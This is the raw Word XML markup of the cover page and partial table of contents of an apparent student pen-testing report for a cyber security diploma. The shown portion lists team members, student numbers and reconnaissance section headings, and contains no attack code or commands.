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FD6F" w14:textId="75A02FF3" w:rsidR="00A75F27" w:rsidRDefault="00A75F27"/>
    <w:p w14:paraId="470C507C" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="00BE37C6" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04"/>
    <w:p w14:paraId="3E7871A0" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AAF0AD4" wp14:editId="683F2906">
            <wp:extent cx="3752581" cy="858741"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="18" name="Picture 18"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1" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3767088" cy="862061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DABD307" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FE9A25" w14:textId="39B2C8C1" w:rsidR="00BE6F04" w:rsidRPr="005D3D1D" w:rsidRDefault="00BE6F04" w:rsidP="005D3D1D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00197747">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Web Application Pen-Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C52B6" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02ADDEB9" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="00C573D9" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C573D9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SCHOOL OF INFOCOMM TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63460113" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="005330E9" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Diploma in Cyber Security &amp; Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24924DFA" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="005330E9" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306392A6" w14:textId="77777777" w:rsidR="005D3D1D" w:rsidRPr="005330E9" w:rsidRDefault="005D3D1D" w:rsidP="00BE6F04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC629AB" w14:textId="5E70ECAC" w:rsidR="00BE6F04" w:rsidRPr="00197747" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00197747">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C99ED51" w14:textId="71B971C9" w:rsidR="00BE6F04" w:rsidRPr="003724B2" w:rsidRDefault="000F652C" w:rsidP="003724B2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520615">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Team FTK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832361B" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w:rsidRDefault="00BE6F04" w:rsidP="00BE6F04">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Arial"/>
          <w:b/>
          <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5123"/>
        <w:gridCol w:w="3112"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w14:paraId="7E95E7F9" w14:textId="77777777" w:rsidTr="00FE4A8A">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5123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54D995A6" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w:rsidRDefault="00BE6F04" w:rsidP="00822CB0">
            <w:pPr>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1EB8">
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A4EDD8B" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w:rsidRDefault="00BE6F04" w:rsidP="00822CB0">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Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1EB8">
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>Student Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w14:paraId="1480C929" w14:textId="77777777" w:rsidTr="00FE4A8A">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5123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59F571E3" w14:textId="48A231D3" w:rsidR="00BE6F04" w:rsidRPr="001A591D" w:rsidRDefault="00BE6F04" w:rsidP="00822CB0">
            <w:pPr>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A591D">
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>Kok Jia Cheng, Glenn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="381EE696" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w:rsidRDefault="00BE6F04" w:rsidP="00822CB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Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>S10208391</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w14:paraId="2169CB22" w14:textId="77777777" w:rsidTr="00FE4A8A">
        <w:trPr>
          <w:trHeight w:val="599"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BB1D401" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="001A591D" w:rsidRDefault="00BE6F04" w:rsidP="00822CB0">
            <w:pPr>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A591D">
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>Colin Foo Chi Yang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="601F0759" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w:rsidRDefault="00BE6F04" w:rsidP="00822CB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Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>S10194197</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w14:paraId="2B3AFECD" w14:textId="77777777" w:rsidTr="00FE4A8A">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5123" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72A29D1B" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="001A591D" w:rsidRDefault="00BE6F04" w:rsidP="00822CB0">
            <w:pPr>
              <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A591D">
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>Tan Yi Qian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63721921" w14:textId="77777777" w:rsidR="00BE6F04" w:rsidRPr="007B1EB8" w:rsidRDefault="00BE6F04" w:rsidP="00822CB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Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Batang" w:cs="Arial"/>
                <w:lang w:val="en-SG"/>
              </w:rPr>
              <w:t>S10204851</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="431B23A2" w14:textId="77777777" w:rsidR="00FA7C50" w:rsidRDefault="00FA7C50">
      <w:pPr>
        <w:sectPr w:rsidR="00FA7C50" w:rsidSect="001931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bookmarkStart w:id="0" w:name="_Toc93487275" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="369808320"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="55A1A2B1" w14:textId="3EB1A75E" w:rsidR="001D4643" w:rsidRPr="00ED0B35" w:rsidRDefault="001D4643" w:rsidP="00353344">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00ED0B35">
            <w:rPr>
              <w:b/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w14:paraId="6FE78669" w14:textId="4F7FC64E" w:rsidR="00FF7D56" w:rsidRDefault="00082A7F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001D4643">
            <w:instrText>TOC \o "1-3" \h \z \u</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc94100213" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Information Findings</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100213 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="201C5478" w14:textId="1585282E"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14" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Passive Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100214 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79E14FD7" w14:textId="44DD485C"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15" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Resources</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100215 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53C0D98D" w14:textId="3B599B93"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16" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The Internet/WWW</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100216 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2866C62C" w14:textId="2A0A75EE"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17" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Analysis</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100217 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09CD588F" w14:textId="56EE6DAB"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18" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100218 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25CB1FDF" w14:textId="02928825"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19" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
